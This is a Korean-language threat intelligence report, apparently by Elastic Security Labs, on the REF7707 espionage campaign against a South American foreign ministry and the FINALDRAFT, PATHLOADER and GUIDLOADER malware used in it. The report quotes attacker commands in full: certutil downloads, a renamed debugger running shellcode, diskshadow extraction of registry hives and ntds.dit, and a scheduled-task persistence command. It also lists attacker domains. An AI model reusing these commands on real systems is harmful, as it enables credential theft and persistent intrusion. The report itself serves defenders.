남미에서 동남아시아까지: REF7707의 취약한 웹

REF7707 요약

엘라스틱 보안 연구소는 동남아시아의 다른 침해 사고와 연관된 남미 국가의 외교부를 표적으로 삼은 캠페인을 모니터링하고 있습니다. 이 캠페인은 REF7707로 추적됩니다.

REF7707 캠페인은 잘 설계되고 성능이 뛰어난 새로운 침입 세트가 특징이지만, 캠페인 소유자는 부실한 캠페인 관리와 일관성 없는 회피 방법을 보여주었습니다.

REF7707이 사용하는 침입 세트에는 FINALDRAFT, GUIDLOADER 및 PATHLOADER라고 하는 새로운 멀웨어 제품군이 포함되어 있습니다. REF7707 - You've Got Malware의 멀웨어 분석 보고서에서 해당 기능 및 성능에 대한 자세한 분석을 제공했습니다: 초안에 숨어 있는 FINALDRAFT.

핵심 사항

• REF7707은 여러 표적에 대해 새로운 멀웨어를 활용했습니다.
• FINALDRAFT 멀웨어는 Windows와 Linux 변종이 모두 있습니다.
• REF7707은 엔드포인트 실행을 얻기 위해 흔하지 않은 LOLBin을 사용했습니다.
• C2의 클라우드 및 타사 서비스 사용량 증가
• 공격자들은 이 캠페인에 사용되지 않은 추가적인 멀웨어와 인프라를 노출시키는 취약한 운영 보안을 사용했습니다.

캠페인 개요

2024년 11월 말, 남미 한 국가의 외교부에서 엔드포인트 행동 경보가 밀집된 클러스터가 발생하는 것을 Elastic Security Labs에서 관찰했습니다. 조사를 계속하면서 새로운 멀웨어, 정교한 표적화, 성숙한 운영 주기를 포함하는 광범위한 캠페인과 침입 세트를 발견했습니다.

캠페인의 일부는 높은 수준의 계획과 기술 역량을 보여주었지만, 수많은 전술적 감독으로 인해 멀웨어 사전 제작 샘플, 인프라 및 추가 피해자가 노출되었습니다.

캠페인 레이아웃(다이아몬드 모델)

Elastic Security Labs는 다이아몬드 모델을 활용하여 공격자, 기능, 인프라, 침입 피해자 간의 높은 수준의 관계를 설명합니다. 다이아몬드 모델은 단일 침입과 활동 스레딩(섹션 8)을 활용하여 인시던트 간의 관계를 만드는 데 가장 일반적으로 사용되지만, 공격자 중심(섹션 7.1.4)으로도 사용할 수 있습니다. 접근 방식을 사용하면 복잡하지만 하나의 다이아몬드를 만들 수 있습니다.

실행 흐름

기본 실행 체인

REF7707은 처음에 남미 국가의 외교부의 Elastic Security 원격 분석을 통해 확인되었습니다. 저희는 원격 서버에서 파일을 다운로드하여 로컬에 저장하는 Microsoft의 인증툴 애플리케이션을 사용하는 일반적인 LOLBin 수법을 관찰했습니다.

certutil  -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData\fontdrvhost.exe

certutil  -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData\fontdrvhost.rar

certutil  -urlcache -split -f https://[redacted]/config.ini C:\ProgramData\config.ini

certutil  -urlcache -split -f https://[redacted]/wmsetup.log C:\ProgramData\wmsetup.log

fontdrvhost.exe, fontdrvhost.rar, config.ini 및 wmsetup.log 을 호스팅하는 웹 서버가 동일한 조직 내에 있었지만 Elastic 에이전트를 실행하고 있지 않았습니다. 이것은 처음으로 관찰된 측면 움직임이었으며 침입에 대한 인사이트를 제공했습니다. 이러한 파일에 대해서는 나중에 자세히 설명하겠지만 지금은 fontdrvhost.exe 는 디버깅 도구, config.ini 는 무기화된 INI 파일, fontdrvhost.rar 은 복구할 수 없는 파일입니다.

WinrsHost.exe

Windows 원격 관리의 원격 셸 플러그인 (WinrsHost.exe)이 연결된 네트워크의 알 수 없는 소스 시스템에서 이 시스템으로 파일을 다운로드하는 데 사용되었습니다. 플러그인은 Windows 원격 관리에서 사용하는 클라이언트 측 프로세스입니다. 이는 공격자가 이미 유효한 네트워크 자격 증명을 보유하고 있으며, 이전에 손상된 호스트 환경에서 측면 이동을 위해 이를 사용하고 있음을 나타냅니다. 이러한 자격 증명이 어떻게 획득되었는지는 알려지지 않았으며, 의심스러운 파일을 호스팅하는 웹 서버에서 자격 증명을 획득했을 가능성이 있습니다.

공격자는 fontdrvhost.exe, fontdrvhost.rar, config.ini, wmsetup.log 을 C:\ProgramData\ 디렉터리에 다운로드했고, 거기에서 다른 여러 Windows 엔드포인트로 이동했습니다. 노출된 모든 인증 정보를 확인할 수는 없지만, 로컬 관리자 계정을 사용하여 이러한 파일을 다운로드하는 것을 확인했습니다.

웹 서버에서 엔드포인트로 다운로드된 후, 행동 규칙 클러스터가 빠르게 연속적으로 실행되는 것을 확인했습니다.

6개의 Windows 시스템에서 Services.exe의 하위로 확인되지 않은 바이너리(08331f33d196ced23bb568689c950b39ff7734b7461d9501c404e2b1dc298cc1)가 실행되는 것이 관찰되었습니다. 이 의심스러운 바이너리는 .exe 확장자를 가진 6개의 낙타 대소문자로 구성된 의사 무작위로 할당된 파일 이름을 사용하며 C:\Windows\ 경로에 위치합니다(예: C:\Windows\cCZtzzwy.exe). 분석을 위해 이 파일을 수집할 수는 없었지만 파일 크기(170,495 바이트)와 위치를 기반으로 이 파일이 PATHLOADER의 변종이라고 추론합니다. 이 파일은 SMB를 사용하여 시스템 간에 전달되었습니다.

FontDrvHost.exe

공격자는 fontdrvhost.exe, fontdrvhost.rar, config.ini, wmsetup.log을 수집한 후 fontdrvhost.exe (cffca467b6ff4dee8391c68650a53f4f3828a0b5a31a9aa501d2272b683205f9)를 실행하여 침입을 계속했습니다. fontdrvhost.exe 은 Windows 서명 디버거 CDB.exe의 이름이 변경된 버전입니다. 공격자는 이 바이너리를 악용하여 신뢰할 수 있는 바이너리로 가장하여 config.ini 파일에 포함된 악성 셸코드를 실행할 수 있었습니다.

CDB는 15 년이 넘은 디버거입니다. 의심스러운 파일이 VirusTotal에 제출되는 빈도를 조사한 결과, 2021 에서 활동이 증가했으며 2024년 말부터 공격적으로 가속화되는 것을 확인할 수 있었습니다.

CDB는 문서화된 LOLBas 파일이지만, 어떻게 악용될 수 있는지에 대한 연구는 아직 많이 발표되지 않았습니다. 보안 연구원 mrd0x는 셸코드 실행, 실행 파일 실행, DLL 실행, 셸 명령 실행, 보안 솔루션 종료에 CDB를 어떻게 사용할 수 있는지 설명하는 훌륭한 분석을 작성했습니다(셸코드 실행기로 사용하는 2016 의 이전 분석도 참고하세요). 새로운 공격 방법은 아니지만 흔하지 않은 공격 방법론이며 다른 침입 메타데이터와 함께 캠페인 전반에서 행위자를 연결하는 데 사용될 수 있습니다.

config.ini 은 분석을 위해 수집되지는 않았지만 fontdrvhost.exe 이 셸 코드를 로드하는 메커니즘이 포함되어 있으며, 이 메커니즘이 호출되는 방식은 FINALDRAFT와 유사합니다.

C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData\fontdrvhost.exe

• -cf - 스크립트 파일의 경로와 이름을 지정합니다. 이 스크립트 파일은 디버거가 시작되는 즉시 실행됩니다.
• config.ini - 로드할 스크립트입니다.
• -o - 대상 애플리케이션에서 시작한 모든 프로세스를 디버그합니다.

그런 다음 fontdrvhost.exe 이 mspaint.exe 을(를) 스폰하고 셸 코드를 주입했습니다.

Elastic Security Labs 리버스 엔지니어들은 이 셸코드를 분석하여 FINALDRAFT 멀웨어를 식별하고 그 특징을 파악했습니다. 마지막으로 fontdrvhost.exe 은 메모리(6d79dfb00da88bb20770ffad636c884bad515def4f8e97e9a9d61473297617e3)에 추가 셸코드를 주입했는데, 이 셸코드도 FINALDRAFT 맬웨어로 식별되었습니다.

FINALDRAFT 분석에서 설명한 대로, 주입 관련 명령에 대한 대상 매개 변수가 제공되지 않으면 악성 코드는 mspaint.exe 또는 conhost.exe 로 기본 설정됩니다.

연결 확인

공격자는 ping.exe 명령과 PowerShell을 통해 여러 연결 테스트를 수행했습니다.

Powershell의 Invoke-WebRequest cmdlet은 웹 리소스의 내용을 가져오는 wget 또는 curl, 와 유사합니다. 이 cmdlet은 명령줄에서 툴을 다운로드하는 데 사용할 수 있지만 여기서는 그렇지 않습니다. 여러 ping이 포함된 컨텍스트에서 이러한 요청은 연결 확인일 가능성이 높습니다.

graph.microsoft[.]com 및 login.microsoftonline[.]com 은 Microsoft의 Outlook 클라우드 전자 메일 서비스 및 기타 Office 365 제품에 대한 API 및 웹 GUI 트래픽을 제공하는 합법적으로 소유된 Microsoft 사이트입니다.

• ping graph.microsoft[.]com
• ping www.google[.]com
• Powershell Invoke-WebRequest -Uri \"hxxps://google[.]com\
• Powershell Invoke-WebRequest -Uri \"hxxps://graph.microsoft[.]com\" -UseBasicParsing
• Powershell Invoke-WebRequest -Uri \"hxxps://login.microsoftonline[.]com\" -UseBasicParsing

digert.ictnsc[.]com 와 support.vmphere[.]com 는 적 소유의 인프라였습니다.

• ping digert.ictnsc[.]com
• Powershell Invoke-WebRequest -Uri \"hxxps://support.vmphere[.]com\" -UseBasicParsing

아래 인프라 섹션에서 이러한 네트워크 도메인에 대해 자세히 설명합니다.

정찰 / 열거 / 자격 증명 수집

공격자가 diskshadow.exe 유틸리티를 사용하여 SoftwareDistribution.txt 이라는 알 수 없는 스크립트를 실행하고 SAM, 보안 및 시스템 레지스트리 하이브를 추출한 후 Active Directory 데이터베이스(ntds.dit)를 복사했습니다. 이러한 자료에는 주로 자격 증명과 자격 증명 메타데이터가 포함되어 있습니다. 공격자는 7zip 유틸리티를 사용하여 결과를 압축했습니다:

diskshadow.exe /s C:\\ProgramData\\SoftwareDistribution.txt

cmd.exe /c copy z:\\Windows\\System32\\config\\SAM C:\\ProgramData\\[redacted].local\\SAM /y

cmd.exe /c copy z:\\Windows\\System32\\config\\SECURITY C:\\ProgramData\\[redacted].local\\SECURITY /y

cmd.exe /c copy z:\\Windows\\System32\\config\\SYSTEM C:\\ProgramData\\[redacted].local\\SYSTEM /y

cmd.exe /c copy z:\\windows\\ntds\\ntds.dit C:\\ProgramData\\[redacted].local\\ntds.dit /y

7za.exe a [redacted].local.7z \"C:\\ProgramData\\[redacted].local\\\"

공격자는 시스템과 도메인에 대한 정보도 열거했습니다:

systeminfo

dnscmd . /EnumZones

net group /domain

C:\\Windows\\system32\\net1 group /domain

quser

reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID

reg query \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"

reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UUID\"

지속성 유지

지속성은 이름이 변경된 CDB.exe 디버거와 무기화된 INI 파일을 SYSTEM로 1분마다 호출하는 예약된 작업을 사용하여 달성되었습니다. 이 방법론은 파이널드래프트가 메모리에 상주하도록 보장했습니다.

schtasks /create /RL HIGHEST /F /tn \"\\Microsoft\\Windows\\AppID\\EPolicyManager\" 
/tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\" 
/sc MINUTE /mo 1 /RU SYSTEM

• schtasks - 예약된 작업 프로그램
• /create - 새 예약 작업을 생성합니다.
• /RL HIGHEST - 작업의 실행 수준을 지정하면 HIGHEST 은 최고 수준의 권한으로 실행됩니다.
• /F - 경고 표시 안 함
• /tn \\Microsoft\\Windows\\AppID\\EPolicyManager\ - 작업 이름, 실제처럼 보이는 예약된 작업을 미러링하려고 시도합니다.
• /tr \"C:\\ProgramData\\fontdrvhost.exe -cf C:\\ProgramData\\config.ini -o C:\\ProgramData\\fontdrvhost.exe\" - 작업(이 경우 앞서 다룬 fontdrvhost.exe 명령어)을 실행해야 합니다.
• /sc MINUTE - 스케줄 유형, MINUTE 은 분 간격으로 실행할 것을 지정합니다.
• /mo 1 - 수정자를 사용하여 일정 간격에 대해 1 을 정의합니다.
• /RU SYSTEM - 는 실행할 계정을 정의합니다. 이 경우 작업은 시스템 사용자로 실행됩니다.

최종안 분석

파이널드래프트 및 패스로더 멀웨어의 기능과 아키텍처를 설명하는 기술 심층 분석은 여기에서 확인할 수 있습니다. 높은 수준에서 보면 FINALDRAFT는 여러 가지 방법으로 기능을 확장하고 내부적으로 네트워크 트래픽을 프록시하는 애드온 모듈을 수용하는 기능을 갖춘 잘 설계된 완전한 기능의 원격 관리 도구입니다.

파이널드래프트는 다양한 수단을 사용하여 명령 및 제어를 설정할 수 있지만, 피해 환경에서 관찰된 가장 주목할 만한 수단은 Microsoft의 그래프 API를 악용하는 것입니다. 저희는 2022년 12월에 보고한 시스타그래프에서 이러한 유형의 써드파티 C2를 처음 관찰했습니다.

이러한 명령 및 제어 유형은 네트워크 가시성에 크게 의존하는 조직의 방어자에게는 포착하기 어려운 공격입니다. 초기 실행 및 체크인이 완료되면 모든 추가 통신은 합법적인 Microsoft 인프라(graph.microsoft[.]com)를 통해 진행되며 다른 조직 워크스테이션과 혼합됩니다. 또한 다른 감염된 시스템의 트래픽을 프록시할 수 있는 릴레이 기능도 지원합니다. 네트워크 기반 침입 탐지 및 위협 인텔리전스 지표에 의존하는 방어를 회피합니다.

패스로더 및 가이드 로더

PATHLOADER와 GUIDLOADER는 모두 메모리에서 암호화된 셸코드를 다운로드하고 실행하는 데 사용됩니다. 이 바이러스는 FINALDRAFT 메모리 캡처에서 확인된 C2 인프라와 문자열을 조사하는 동안 VirusTotal에서 발견되었습니다. 이는 파이널드래프트 페이로드와 관련된 경우에만 관찰되었습니다.

바이러스토탈의 5월 2023 샘플은 REF7707 침입 세트에서 가장 먼저 식별된 바이너리입니다. 이 샘플은 태국의 웹 사용자가 처음 제출한 것으로, dwn.exe (9a11d6fcf76583f7f70ff55297fb550fed774b61f35ee2edd95cf6f959853bcf)은 poster.checkponit[.]com 및 support.fortineat[.]com에서 암호화된 FINALDRAFT 바이너리를 로드하는 PATHLOADER 변종입니다.

2023년 6월부터 8월까지 홍콩 VirusTotal 웹 사용자가 12개의 가이드 로더 샘플을 업로드했습니다. 이 샘플은 각각 암호화된 페이로드가 다운로드되는 방식에 약간의 수정이 있었으며 FINALDRAFT 도메인을 사용하도록 구성되었습니다:

• poster.checkponit[.]com
• support.fortineat[.]com
• Google Firebase (firebasestorage.googleapis[.]com)
• 페이스트빈 (pastebin[.]com)
• 동남아시아 대학 공용 웹 스토리지 시스템

GUIDLOADER의 일부 샘플은 미완성 또는 손상된 것으로 보이며, 작동하지 않는 복호화 루틴이 있는 반면, 다른 샘플은 바이너리에 디버그 문자열이 포함되어 있습니다. 이러한 변화는 샘플이 개발 및 테스트 과정의 일부였음을 시사합니다.

FINALDRAFT bridging OS’

2024년 말, 미국과 브라질에서 각각 한 개씩 두 개의 리눅스 엘프 파이널드래프트 변종이 VirusTotal에 업로드되었습니다. 이 샘플은 유사한 C2 다용도성과 Windows 버전에서 사용할 수 있는 명령의 부분적인 재구현을 특징으로 합니다. support.vmphere[.]com, update.hobiter[.]com 및 pastebin.com에 대한 URL이 이 파일에서 가져왔습니다.

인프라 분석

FINALDRAFT 멀웨어 분석 보고서에서 REF7707 침입에서 수집된 샘플에서 여러 도메인이 확인되었고, 코드 유사성을 통해 다른 샘플도 확인되었습니다.

서비스 배너 해시

hobiter[.]com (이전 섹션에서 설명한 FINALDRAFT의 ELF 변종에서 관찰된 도메인)에 대한 Censys 검색은 47.83.8.198의 IP 주소를 반환합니다. 이 서버는 홍콩 기반이며 포트 80 및 443을 서비스하고 있습니다. 문자열 "hobiter[.]com"는 포트 443의 TLS 인증서와 연결되어 있습니다. 이 포트의 서비스 배너 해시에 대한 Censys 쿼리 피벗은 해당 해시를 공유하는 6개의 추가 서버를 산출합니다(총 7개).

두 서버(203.232.112[.]186 및 13.125.236[.]162)가 다른 다섯 서버와 동일한 프로필을 공유하지 않습니다. 서비스 배너 해시는 여전히 일치하지만 포트 443가 아니라 포트 15701, 15702, 15703 및 15709에 있습니다. 또한 문제의 포트는 TLS 통신을 지원하지 않는 것으로 보입니다. 높은 신뢰도를 가지고 REF7707에 기여한 것은 아니지만 완성도를 위해 포함시켰습니다.

오리지널 "호빗" 서버를 포함한 나머지 5개 서버는 몇 가지 유사점을 공유합니다:

• 포트의 서비스 배너 해시 일치 443
• 동남아시아 지리적 위치
• Windows OS
• Cloudflare 발급 TLS 인증서
• 대부분은 동일한 ASN을 가지고 있습니다 Alibaba

호빗과 VMphere

update.hobiter[.]com 및 support.vmphere[.]com 이 ELF 바이너리(biosets.rar)에서 발견되었습니다. 12월 13, 2024부터. 두 도메인 모두 1년 전인 12, 2023년 9월에 등록되었습니다. 이 ELF 바이너리는 유사한 C2 다용도성과 Windows 버전의 FINALDRAFT에서 사용할 수 있는 명령어를 부분적으로 재구현한 것이 특징입니다.

hobiter[.]com 및 vmphere[.]com 의 이름 서버 조회는 각각에 대한 Cloudflare 이름 서버 레코드만 반환하고 A 레코드는 반환하지 않습니다. 알려진 하위 도메인을 검색하면 Cloudflare 소유의 IP 주소를 가리키는 A 레코드가 나옵니다.

ICTNSC

ictnsc[.]com 는 공격자가 수행한 연결 검사(ping digert.ictnsc[.]com)에서 위의 REF7707 침입과 직접적으로 연관되어 있습니다. 이 도메인(8.213.217[.]182)과 연결된 서버는 위에 설명된 HTTPS 서비스의 Censys 서비스 배너 해시를 통해 식별되었습니다. 다른 식별된 인프라와 마찬가지로 하위 도메인은 Cloudflare 소유 IP 주소로 확인되며, 부모 도메인에는 Cloudflare NS 레코드만 있습니다. ictnsc[.]com 는 8, 2023월 일에 등록되었습니다.

악의적인 연관성을 확인할 수는 없지만 ict.nsc[.]ru 도메인은 연방 정보 및 컴퓨팅 기술 연구 센터(FRC 또는 ICT)의 웹 자산이라는 점에 유의해야 합니다. 이 러시아 조직은 컴퓨터 모델링, 소프트웨어 엔지니어링, 데이터 처리, 인공 지능 및 고성능 컴퓨팅과 같은 다양한 분야의 연구를 수행합니다.

REF7707 침입에서는 관찰되지 않았지만, 관찰된 도메인(ictnsc[.]com)에는 ict 하위 도메인(ict.ictnsc[.]com)이 있는데, 이는 ict.nsc[.]ru과 놀라울 정도로 유사합니다. 다시 말하지만, 합법적인 FRC 또는 ITC와 관련이 있는지 확인할 수 없으며, 위협 행위자가 도메인이 서로 유사하거나 혼동되도록 의도한 것으로 보입니다.

Autodiscovar

Autodiscovar[.]com 는 어떠한 FINALDRAFT 멀웨어와도 직접적으로 연관되지 않았습니다. 웹 인프라 식별자에 대한 피벗을 통해 간접적으로 REF7707 인프라와 연관되어 있습니다. 부모 도메인에는 Cloudflare NS 레코드만 있습니다. VirusTotal ()을 통해 식별된 하위cloud.autodiscovar[.]com 도메인은 Cloudflare 소유 IP 주소를 가리킵니다. 이 도메인 네임은 다른 FINALDRAFT 및 REF7707 웹 인프라와 유사하며 HTTPS 서비스 배너 해시를 공유합니다. 이 도메인은 26, 2022년 월에 등록되었습니다.

D-링크 및 가상 머신 클라우드

d-links[.]net 및 vm-clouds[.]net 은 모두 hobiter[.]com 및 vmphere[.]com와 같은 날인 12, 2023 9월 , 에 등록되었습니다. 이러한 사이트를 호스팅하는 서버는 동일한 HTTPS 서비스 배너 해시도 공유합니다. pol.vm-clouds[.]net 가 이전에 등록되었지만 FINALDRAFT 멀웨어와 직접적으로 연관되어 있지 않으며 현재 라우팅 가능한 하위 도메인을 가지고 있지 않습니다.

Fortineat

support.fortineat[.]com 가 PATHLOADER 샘플(dwn.exe)에 하드 코딩되었습니다. 도메인을 분석하는 과정에서 해당 도메인이 현재 등록되어 있지 않다는 사실을 발견했습니다. 도메인과 통신하는 다른 샘플을 식별하기 위해 저희 팀은 이 도메인을 등록하고 들어오는 연결을 수신 대기하도록 웹 서버를 구성했습니다.

포트 443을 통한 연결 시도를 기록했으며, 여기서 특정 수신 바이트 패턴을 식별했습니다. 이 연결은 동남아시아의 8개 통신 및 인터넷 인프라 회사에서 제공되었으며, 이는 REF7707 침입 세트의 피해자가 있을 수 있음을 나타냅니다.

Checkponit

poster.checkponit[.]com 는 2023년 5월과 7월 사이에 4개의 GUIDLOADER 샘플과 4개의 PATHLOADER 샘플에서 관찰되었으며, FINALDRAFT 암호화된 셸코드를 호스팅하는 데 사용되었습니다. checkponit[.]com 등록은 26년 2022월 일에 만들어졌습니다. 현재 checkponit[.]com 또는 poster.checkponit[.]com에 대한 A 레코드가 없습니다.

타사 인프라

Microsoft의 graph.microsoft[.]com 은 그래프 API를 통한 명령 및 제어를 위해 FINALDRAFT PE 및 ELF 변형에서 사용됩니다. 이 서비스는 어디에나 있으며 Office 365를 사용하는 기업의 중요한 비즈니스 프로세스에 사용됩니다. 방어자는 비즈니스에 미치는 영향이 이해되지 않는 한 이 도메인을 차단 목록에 추가하지 않는 것이 좋습니다.

Google의 Firebase 서비스(firebasestorage.googleapis[.]com), Pastebin(pastebin[.]com) 및 동남아시아의 한 대학교는 로더(PATHLOADER 및 GUIDLOADER)가 FINALDRAFT의 마지막 단계를 다운로드하고 암호를 해독할 수 있도록 암호화된 페이로드를 호스팅하는 데 사용되는 타사 서비스입니다.

REF7707 타임라인

결론

REF7707은 남미 국가의 외무부 침입을 조사하는 과정에서 발견되었습니다.

조사 결과 FINALDRAFT와 다양한 로더와 같은 신종 멀웨어가 발견되었습니다. 이러한 도구는 기존 멀웨어 방지 도구가 탐지하기 어려운 기본 제공 운영 체제 기능을 사용하여 배포되고 지원됩니다.

FINALDRAFT는 명령 및 제어를 위해 Microsoft의 그래프 API 서비스를 공동 채택하여 기존 네트워크 기반 침입 탐지 및 방지 시스템에서 관찰할 수 있는 악성 지표를 최소화합니다. 암호화된 페이로드 스테이징을 위한 타사 호스팅 플랫폼도 감염 체인 초기에 이러한 시스템에 문제를 일으킵니다.

이 보고서의 지표를 사용한 VirusTotal 제출자 및 피봇의 개요를 보면 동남아시아 및 남미에 상대적으로 많은 지역이 존재한다는 것을 알 수 있습니다. 시스타그래프 역시 마찬가지로 저희가 관찰한 최초의 야생 그래프 API 악용 사례로, 동남아시아 국가의 외교부에 대한 공격(REF2924)과 관련이 있습니다.

Elastic Security Labs에서는 지식이 풍부한 전문가가 운영하는 인포섹 도메인 전반의 방어 기능을 지원하여 지능형 위협을 가장 잘 완화합니다.

REF7707을 통해 MITRE ATT&CK

Elastic은 MITRE ATT& CK 프레임워크를 사용하여 지능형 지속적 위협이 기업 네트워크에 대해 사용하는 일반적인 전술, 기술 및 절차를 문서화합니다.

• 정찰
• 실행
• 지속성 유지
• 권한 확대
• 방어 회피
• 자격 증명 액세스
• 탐색
• 내부 확산
• 수집
• 명령 및 제어
• 침투

REF7707 감지

YARA

• FINALDRAFT(Windows)
• FINALDRAFT(Linux)
• FINALDRAFT(멀티 OS)
• 경로 로더
• 가이드 로더

관찰

이 연구에서는 다음과 같은 관찰 가능성에 대해 논의했습니다.

참고 자료

위의 조사에서 참조한 내용은 다음과 같습니다:

• https://www.elastic.co/security-labs/finaldraft
• https://mrd0x.com/the-power-of-cdb-debugging-tool/
• https://web.archive.org/web/20210305190100/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

Elastic 보안 연구소 소개

Elastic Security Labs는 새로운 위협에 대한 연구를 공개적으로 제공함으로써 위협 환경에 긍정적인 변화를 일으키기 위해 최선을 다하고 있습니다.

엘라스틱 시큐리티 랩을 팔로우하고 www.elastic.co/security-labs/ 에서 연구 내용을 확인해 보세요. 이 연구에 활용된 기술 등을 확인하시려면 Elastic Security를 확인해보세요.